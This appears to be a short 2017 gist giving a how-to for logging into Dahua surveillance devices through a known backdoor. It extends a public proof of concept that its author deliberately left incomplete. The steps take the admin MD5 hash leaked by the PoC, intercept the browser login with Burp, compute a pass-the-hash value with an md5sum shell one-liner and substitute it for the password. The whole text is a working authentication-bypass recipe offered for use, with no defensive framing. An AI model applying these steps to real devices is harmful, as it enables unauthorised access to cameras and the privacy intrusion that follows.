Created
August 30, 2017 11:06
HOW-TO dahua-backdoor-PoC
The following repo is useful to exploit Dahua devices: https://github.com/mcw0/PoC

However, the PoC dahua-backdoor-PoC.py is "intentionally missing essential details to be direct usable for anything else than login/logout."

So how to log in from the browser easily?

1) From the Python PoC, extract the "Downloaded MD5 hash" (usually for admin), for example:

   [i] Downloaded MD5 hash: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

2) In the browser, complete the fields:

   Username: admin
   Password: typeanythingyouwant

3) Proxify (Burp, for example) and intercept the traffic before you hit the login button.

4) Forward the first request, then extract the value "random" from the server's response, for example 111111111.

5) Calculate:

   echo -n "admin:111111111:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | md5sum | tr '[:lower:]' '[:upper:]'

6) In the second request sent to the server, replace the value of the "password" key with the hash computed by the command above.

7) :)